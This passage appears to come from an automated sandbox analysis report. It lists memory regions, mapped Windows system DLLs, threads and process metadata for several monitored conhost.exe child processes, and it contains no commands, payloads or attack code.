0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c42e0000" filename = "" Region: id = 789 start_va = 0x7ff6c440b000 end_va = 0x7ff6c440cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c440b000" filename = "" Region: id = 790 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 791 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 792 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 793 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 794 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 795 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 796 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 797 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 798 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 799 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 800 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 801 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4051 start_va = 0x4006340000 end_va = 0x400634ffff entry_point = 0x0 region_type = private name = "private_0x0000004006340000" filename = "" Region: id = 4052 start_va = 0x40064e0000 end_va = 0x40064effff entry_point = 0x0 region_type = private name = "private_0x00000040064e0000" filename = "" Region: id = 4053 start_va = 0x4006620000 end_va = 0x400665ffff entry_point = 0x0 region_type = private name = "private_0x0000004006620000" filename = "" Region: id = 4054 start_va = 0x4006660000 end_va = 0x400676dfff entry_point = 0x0 region_type = private name = "private_0x0000004006660000" filename = "" Region: id = 4055 start_va = 0x4007ec0000 end_va = 0x40081f6fff entry_point = 0x4007ec0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4056 start_va = 0x4008200000 end_va = 0x4008418fff entry_point = 0x0 region_type = private name = "private_0x0000004008200000" filename = "" Region: id = 4057 start_va = 0x4008420000 end_va = 0x4008638fff entry_point = 0x0 region_type = private name = "private_0x0000004008420000" filename = "" Region: id = 4058 start_va = 0x4008640000 end_va = 0x400885dfff entry_point = 0x0 region_type = private name = "private_0x0000004008640000" filename = "" Region: id = 4059 start_va = 0x4008860000 end_va = 0x4008976fff entry_point = 0x0 region_type = private name = "private_0x0000004008860000" filename = "" Region: id = 4060 start_va = 0x4008980000 end_va = 0x40089bffff entry_point = 0x0 region_type = private name = "private_0x0000004008980000" filename = "" Region: id = 4061 start_va = 0x7ff6c4409000 end_va = 0x7ff6c440afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4409000" filename = "" Region: id = 4062 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4063 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4064 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4065 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4066 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4067 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4068 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4069 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4070 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 30 os_tid = 0xc38 Thread: id = 46 os_tid = 0xc94 Thread: id = 56 os_tid = 0xcd8 Thread: id = 276 os_tid = 0x1180 Process: id = "30" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x67770000" os_pid = "0xc3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x82c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 614 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 615 start_va = 0x7f69e20000 end_va = 0x7f69e3ffff entry_point = 0x0 region_type = private name = "private_0x0000007f69e20000" filename = "" Region: id = 616 start_va = 0x7f69e40000 end_va = 0x7f69e53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007f69e40000" filename = "" Region: id = 617 start_va = 0x7f69e60000 end_va = 0x7f69e9ffff entry_point = 0x0 region_type = private name = "private_0x0000007f69e60000" filename = "" Region: id = 618 start_va = 0x7df5ff210000 end_va = 0x7ff5ff20ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff210000" filename = "" Region: id = 619 start_va = 0x7ff6c4700000 end_va = 0x7ff6c4722fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4700000" filename = "" Region: id = 620 start_va = 0x7ff6c4724000 end_va = 0x7ff6c4724fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4724000" filename = "" Region: id = 621 start_va = 0x7ff6c472e000 end_va = 0x7ff6c472ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c472e000" filename = "" Region: id = 622 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 623 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 624 start_va = 0x7f69f20000 end_va = 0x7f6a01ffff entry_point = 0x0 region_type = private name = "private_0x0000007f69f20000" filename = "" Region: id = 625 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 626 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 854 start_va = 0x7f69e20000 end_va = 0x7f69e2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007f69e20000" filename = "" Region: id = 855 start_va = 0x7f69e30000 end_va = 0x7f69e36fff entry_point = 0x0 region_type = private name = "private_0x0000007f69e30000" filename = "" Region: id = 856 start_va = 0x7f69ea0000 end_va = 0x7f69edffff entry_point = 0x0 region_type = private name = "private_0x0000007f69ea0000" filename = "" Region: id = 857 start_va = 0x7f69ee0000 end_va = 0x7f69ee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007f69ee0000" filename = "" Region: id = 858 start_va = 0x7f69ef0000 end_va = 0x7f69ef6fff entry_point = 0x0 region_type = private name = "private_0x0000007f69ef0000" filename = "" Region: id = 859 start_va = 0x7f69f00000 end_va = 0x7f69f0ffff entry_point = 0x0 region_type = private name = "private_0x0000007f69f00000" filename = "" Region: id = 860 start_va = 0x7f69f10000 end_va = 0x7f69f10fff entry_point = 0x0 region_type = private name = "private_0x0000007f69f10000" filename = "" Region: id = 861 start_va = 0x7f6a020000 end_va = 0x7f6a0ddfff entry_point = 0x7f6a020000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 862 start_va = 0x7f6a0e0000 end_va = 0x7f6a267fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007f6a0e0000" filename = "" Region: id = 863 start_va = 0x7f6a270000 end_va = 0x7f6a3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007f6a270000" filename = "" Region: id = 864 start_va = 0x7f6a400000 end_va = 0x7f6b7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007f6a400000" filename = "" Region: id = 865 start_va = 0x7f6b800000 end_va = 0x7f6b800fff entry_point = 0x0 region_type = private name = "private_0x0000007f6b800000" filename = "" Region: id = 866 start_va = 0x7ff6c4600000 end_va = 0x7ff6c46fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4600000" filename = "" Region: id = 867 start_va = 0x7ff6c472c000 end_va = 0x7ff6c472dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c472c000" filename = "" Region: id = 868 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 869 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 870 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 871 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 872 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 873 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 874 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 875 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 876 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 877 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 878 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 879 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 31 os_tid = 0xc40 Thread: id = 47 os_tid = 0xc9c Thread: id = 59 os_tid = 0xce4 Thread: id = 259 os_tid = 0x1118 Process: id = "31" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xe520000" os_pid = "0xc44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0x518" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 627 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 628 start_va = 0x31f7840000 end_va = 0x31f785ffff entry_point = 0x0 region_type = private name = "private_0x00000031f7840000" filename = "" Region: id = 629 start_va = 0x31f7860000 end_va = 0x31f7873fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031f7860000" filename = "" Region: id = 630 start_va = 0x31f7880000 end_va = 0x31f78bffff entry_point = 0x0 region_type = private name = "private_0x00000031f7880000" filename = "" Region: id = 631 start_va = 0x7df5ff590000 end_va = 0x7ff5ff58ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff590000" filename = "" Region: id = 632 start_va = 0x7ff6c45d0000 end_va = 0x7ff6c45f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c45d0000" filename = "" Region: id = 633 start_va = 0x7ff6c45fa000 end_va = 0x7ff6c45fafff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45fa000" filename = "" Region: id = 634 start_va = 0x7ff6c45fe000 end_va = 0x7ff6c45fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45fe000" filename = "" Region: id = 635 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 636 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 637 start_va = 0x31f7a00000 end_va = 0x31f7afffff entry_point = 0x0 region_type = private name = "private_0x00000031f7a00000" filename = "" Region: id = 638 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 639 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 880 start_va = 0x31f7840000 end_va = 0x31f784ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031f7840000" filename = "" Region: id = 881 start_va = 0x31f7850000 end_va = 0x31f7856fff entry_point = 0x0 region_type = private name = "private_0x00000031f7850000" filename = "" Region: id = 882 start_va = 0x31f78c0000 end_va = 0x31f797dfff entry_point = 0x31f78c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 883 start_va = 0x31f7980000 end_va = 0x31f79bffff entry_point = 0x0 region_type = private name = "private_0x00000031f7980000" filename = "" Region: id = 884 start_va = 0x31f79c0000 end_va = 0x31f79c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031f79c0000" filename = "" Region: id = 885 start_va = 0x31f79d0000 end_va = 0x31f79d6fff entry_point = 0x0 region_type = private name = "private_0x00000031f79d0000" filename = "" Region: id = 886 start_va = 0x31f79e0000 end_va = 0x31f79e0fff entry_point = 0x0 region_type = private name = "private_0x00000031f79e0000" filename = "" Region: id = 887 start_va = 0x31f79f0000 end_va = 0x31f79f0fff entry_point = 0x0 region_type = private name = "private_0x00000031f79f0000" filename = "" Region: id = 888 start_va = 0x31f7b50000 end_va = 0x31f7b5ffff entry_point = 0x0 region_type = private name = "private_0x00000031f7b50000" filename = "" Region: id = 889 start_va = 0x31f7b60000 end_va = 0x31f7ce7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031f7b60000" filename = "" Region: id = 890 start_va = 0x31f7cf0000 end_va = 0x31f7e70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031f7cf0000" filename = "" Region: id = 891 start_va = 0x31f7e80000 end_va = 0x31f927ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031f7e80000" filename = "" Region: id = 892 start_va = 0x7ff6c44d0000 end_va = 0x7ff6c45cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c44d0000" filename = "" Region: id = 893 start_va = 0x7ff6c45fc000 end_va = 0x7ff6c45fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45fc000" filename = "" Region: id = 894 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 895 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 896 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 897 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 898 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 899 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 900 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 901 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 902 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 903 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 904 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 905 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 32 os_tid = 0xc48 Thread: id = 48 os_tid = 0xca4 Thread: id = 60 os_tid = 0xce8 Thread: id = 255 os_tid = 0x1100 Process: id = "32" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x66bd2000" os_pid = "0xc4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0xaf8" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 640 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 641 start_va = 0x7126eb0000 end_va = 0x7126ecffff entry_point = 0x0 region_type = private name = "private_0x0000007126eb0000" filename = "" Region: id = 642 start_va = 0x7126ed0000 end_va = 0x7126ee3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007126ed0000" filename = "" Region: id = 643 start_va = 0x7126ef0000 end_va = 0x7126f2ffff entry_point = 0x0 region_type = private name = "private_0x0000007126ef0000" filename = "" Region: id = 644 start_va = 0x7df5ffe50000 end_va = 0x7ff5ffe4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe50000" filename = "" Region: id = 645 start_va = 0x7ff6c4720000 end_va = 0x7ff6c4742fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4720000" filename = "" Region: id = 646 start_va = 0x7ff6c4745000 end_va = 0x7ff6c4745fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4745000" filename = "" Region: id = 647 start_va = 0x7ff6c474e000 end_va = 0x7ff6c474ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c474e000" filename = "" Region: id = 648 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 649 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 650 start_va = 0x7126f80000 end_va = 0x712707ffff entry_point = 0x0 region_type = private name = "private_0x0000007126f80000" filename = "" Region: id = 651 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 652 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 906 start_va = 0x7126eb0000 end_va = 0x7126ebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007126eb0000" filename = "" Region: id = 907 start_va = 0x7126ec0000 end_va = 0x7126ec6fff entry_point = 0x0 region_type = private name = "private_0x0000007126ec0000" filename = "" Region: id = 908 start_va = 0x7126f30000 end_va = 0x7126f6ffff entry_point = 0x0 region_type = private name = "private_0x0000007126f30000" filename = "" Region: id = 909 start_va = 0x7126f70000 end_va = 0x7126f70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007126f70000" filename = "" Region: id = 910 start_va = 0x7127080000 end_va = 0x712713dfff entry_point = 0x7127080000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 911 start_va = 0x7127140000 end_va = 0x7127146fff entry_point = 0x0 region_type = private name = "private_0x0000007127140000" filename = "" Region: id = 912 start_va = 0x7127150000 end_va = 0x7127150fff entry_point = 0x0 region_type = private name = "private_0x0000007127150000" filename = "" Region: id = 913 start_va = 0x7127160000 end_va = 0x7127160fff entry_point = 0x0 region_type = private name = "private_0x0000007127160000" filename = "" Region: id = 914 start_va = 0x7127250000 end_va = 0x712725ffff entry_point = 0x0 region_type = private name = "private_0x0000007127250000" filename = "" Region: id = 915 start_va = 0x7127260000 end_va = 0x71273e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007127260000" filename = "" Region: id = 916 start_va = 0x71273f0000 end_va = 0x7127570fff entry_point = 0x0 region_type = pagefile_backed name = 